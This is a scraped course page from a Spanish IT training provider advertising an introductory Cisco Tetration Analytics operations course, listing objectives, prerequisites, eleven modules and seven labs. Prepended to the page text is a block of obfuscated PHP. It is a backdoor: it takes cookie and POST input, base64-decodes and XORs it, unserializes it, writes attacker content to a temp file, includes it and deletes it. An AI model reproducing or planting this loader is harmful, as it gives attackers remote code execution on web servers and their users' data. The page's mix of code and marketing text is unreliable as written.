$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} Introduction to Cisco Tetration Analytics Operations and Administration|Grupo Loyal

Introduction to Cisco Tetration Analytics Operations and Administration

This course will familiarize you and help you understand how The Cisco Tetration Analytics platform enables efficient datacenter operations by providing pervasive visibility, behavior-based application insight and migration to a zero-trust model.

Objetivos

After completing this course you should be able to:

Enables pervasive visibility of traffic across datacenter infrastructure
Use long term data retention for forensics and analysis
Create communication and dependencies for all applications within the datacenter
Empower companies to get to a whitelist policy model Identifies behavior deviation in real time
Perform forensics operations

Big Data

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
10 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

ndividuals working with the Cisco Tetration Analytics platform

Conocimientos requeridos

Attendees should meet the following prerequisites:

Familiarity with Data Center Technology
Familiarity with Network operation
Understanding of basic network security

Temario

Module 1: Tetration Overview

Defining and Positioning Cisco Tetration Analytics
Telemetry
Platform
Intent-Based Policy
Machine Learning
Network Performance Monitoring and other Use Cases
Module 2: Tetration Components

Architecture
Data Collection
Sensors and Agents
Flow Collectors
Analytics Engine
Open Access
Module 3: Operational Concepts

Scopes
Tenants
RBAC
Annotations
Module 4: Tetration Setup and Deployment Models

On Premise Options
SaaS
Tetration-V
Installation Procedure
Creating Scopes, Roles, and Users
Deploy Hardware Sensors
Deploy NetFlow Sensors
Deploy ERSPAN Sensors
Module 5: Software Agents

Software Agents Overview
Software Agents Features
Software Agents Configuration
Module 6: Application Dependency Mapping

Why ADM?
Tetration Application Insight
ADM Process
ADM Run Results
Module 7: Cisco Tetration Analytics Policy Enforcement Overview

Module 8: Cisco Tetration Flow Search

Results Filtered by Scope
Searching with Conjunctions
Flow Explore Integrated
User Annotations
Module 9: Tetration Policy Analysis

Enable Policy Analysis
Live Policy Analysis
Backdated Policy Experiments
Quick Policy Analysis
Module 10: Tetration Apps and API

App Store
User Apps
Visualize Data Sources
Bring your own Data
OpenAPI
Module 11: Tetration Ecosystem

Platform Integrations
ADCs
FW Management Tools
Phantom
InfoBlox
ServiceNow
Splunk
Turbonomic
Veeam
Corvil and Extra Hop
Labs

Lab 1: Exploring the GUI
Lab 2: Software Agent Installation
Lab 3: Application Dependency Mapping with Agents
Lab 4: Enforcement
Lab 5: Flow Search
Lab 6: Advanced ADM Run
Lab 7: Policy Analysis

Solicita información del curso

It Formacion

It Formacion